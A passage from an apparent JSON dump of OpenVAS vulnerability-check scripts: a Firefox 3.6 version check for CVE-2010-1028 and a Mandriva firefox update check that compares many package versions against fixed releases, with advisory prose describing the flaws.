will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow the attackers to execute arbitrary code.\n Impact Level: System/Application\";\ntag_affected = \"Mozilla Firefox 3.6 and prior\";\ntag_insight = \"The flaw is caused by unspecified errors and unknown attack vectors.\";\ntag_solution = \"Upgrade to Mozilla Firefox version 3.6.3 or later\n For updates refer to http://www.mozilla.com/en-US/firefox/upgrade.html\";\ntag_summary = \"The host is running Mozilla Firefox and is prone to unspecified\n vulnerability.\";\n\nif(description)\n{\n script_id(902027);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-23 15:59:14 +0100 (Tue, 23 Mar 2010)\");\n script_cve_id(\"CVE-2010-1028\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mozilla Firefox Unspecified Vulnerability (Windows)\");\n\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (c) 2010 SecPod\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_require_keys(\"Firefox/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38608\");\n script_xref(name : \"URL\" , value : \"http://www.h-online.com/security/news/item/Zero-day-exploit-for-Firefox-3-6-936124.html\");\n script_xref(name : \"URL\" , value : \"http://blog.psi2.de/en/2010/02/20/going-commercial-with-firefox-vulnerabilities/comment-page-1/#comment-666\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get Firefox version from KB\nfoxVer = get_kb_item(\"Firefox/Win/Ver\");\nif(!foxVer){\n exit(0);\n}\n\n## Check for Mozilla Firefox Version prior to 3.6\nif(version_is_less_equal(version:foxVer, test_version:\"3.6\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-26T11:05:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0176", "CVE-2010-0165", "CVE-2010-0168", "CVE-2010-0174", "CVE-2010-0172", "CVE-2010-0175", "CVE-2010-0170", "CVE-2010-0167", "CVE-2010-1122", "CVE-2010-0164", "CVE-2010-0173", "CVE-2010-0178", "CVE-2010-0177", "CVE-2009-3555", "CVE-2010-0182", "CVE-2010-0181", "CVE-2010-1028", "CVE-2010-0179"], "description": "Check for the Version of firefox", "modified": "2018-01-25T00:00:00", "published": "2010-04-16T00:00:00", "id": "OPENVAS:1361412562310830981", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830981", "type": "openvas", "title": "Mandriva Update for firefox MDVSA-2010:070 (firefox)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for firefox MDVSA-2010:070 (firefox)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security issues were identified and fixed in firefox:\n\n Security researcher regenrecht reported (via TippingPoint's Zero Day\n Initiative) a potential reuse of a deleted image frame in Firefox 3.6's\n handling of multipart/x-mixed-replace images. Although no exploit was\n shown, re-use of freed memory has led to exploitable vulnerabilities\n in the past (CVE-2010-0164).\n \n Mozilla developers identified and fixed several stability bugs in the\n browser engine used in Firefox and other Mozilla-based products. Some\n of these crashes showed evidence of memory corruption under certain\n circumstances and we presume that with enough effort at least some\n of these could be exploited to run arbitrary code (CVE-2010-0165,\n CVE-2010-0167).\n \n Mozilla developer Josh Soref of Nokia reported that documents\n failed to call certain security checks when attempting to preload\n images. Although the image content is not available to the page, it\n is possible to specify protocols that are normally not allowed in a\n web page such as file:. This includes internal schemes implemented\n by add-ons that might perform privileged actions resulting in\n something like a Cross-Site Request Forgery (CSRF) attack against\n the add-on. Potential severity would depend on the add-ons installed\n (CVE-2010-0168).\n \n Mozilla developer Blake Kaplan reported that the window.location object\n was made a normal overridable JavaScript object in the Firefox 3.6\n browser engine (Gecko 1.9.2) because new mechanisms were developed\n to enforce the same-origin policy between windows and frames. This\n object is unfortunately also used by some plugins to determine the page\n origin used for access restrictions. A malicious page could override\n this object to fool a plugin into granting access to data on another\n site or the local file system. The behavior of older Firefox versions\n has been restored (CVE-2010-0170).\n \n Mozilla developer Justin Dolske reported that the new asynchronous\n Authorization Prompt (HTTP username and password) was not always\n attached to the correct window. Although we have not demonstrated\n this, it may be possible for a malicious page to convince a user\n to open a new tab or popup to a trusted service and then have the\n HTTP authorization prompt from the malicious page appear to be the\n login prompt for the trusted page. This potential attack is greatly\n mitigat ... \n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"firefox on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-04/msg00007.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830981\");\n script_version(\"$Revision: 8528 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 08:57:36 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 17:02:11 +0200 (Fri, 16 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2010:070\");\n script_cve_id(\"CVE-2010-0164\", \"CVE-2010-0165\", \"CVE-2010-0167\", \"CVE-2010-0168\", \"CVE-2010-0170\", \"CVE-2010-0172\", \"CVE-2010-1028\", \"CVE-2010-1122\", \"CVE-2010-0173\", \"CVE-2010-0174\", \"CVE-2010-0175\", \"CVE-2010-0176\", \"CVE-2010-0177\", \"CVE-2010-0178\", \"CVE-2010-0179\", \"CVE-2010-0181\", \"CVE-2010-0182\", \"CVE-2009-3555\");\n script_name(\"Mandriva Update for firefox MDVSA-2010:070 (firefox)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.5.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.5.10~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc2\", rpm:\"libopensc2~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc-devel\", rpm:\"libopensc-devel~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtotem-plparser7\", rpm:\"libtotem-plparser7~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtotem-plparser-devel\", rpm:\"libtotem-plparser-devel~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-plugin-opensc\", rpm:\"mozilla-plugin-opensc~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opensc\", rpm:\"opensc~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem\", rpm:\"totem~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-common\", rpm:\"totem-common~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-gstreamer\", rpm:\"totem-gstreamer~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-mozilla\", rpm:\"totem-mozilla~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-mozilla-gstreamer\", rpm:\"totem-mozilla-gstreamer~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.22.1~0.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc2\", rpm:\"lib64opensc2~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc-devel\", rpm:\"lib64opensc-devel~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64totem-plparser7\", rpm:\"lib64totem-plparser7~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64totem-plparser-devel\", rpm:\"lib64totem-plparser-devel~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"beagle\", rpm:\"beagle~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-crawl-system\", rpm:\"beagle-crawl-system~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-doc\", rpm:\"beagle-doc~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-evolution\", rpm:\"beagle-evolution~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui\", 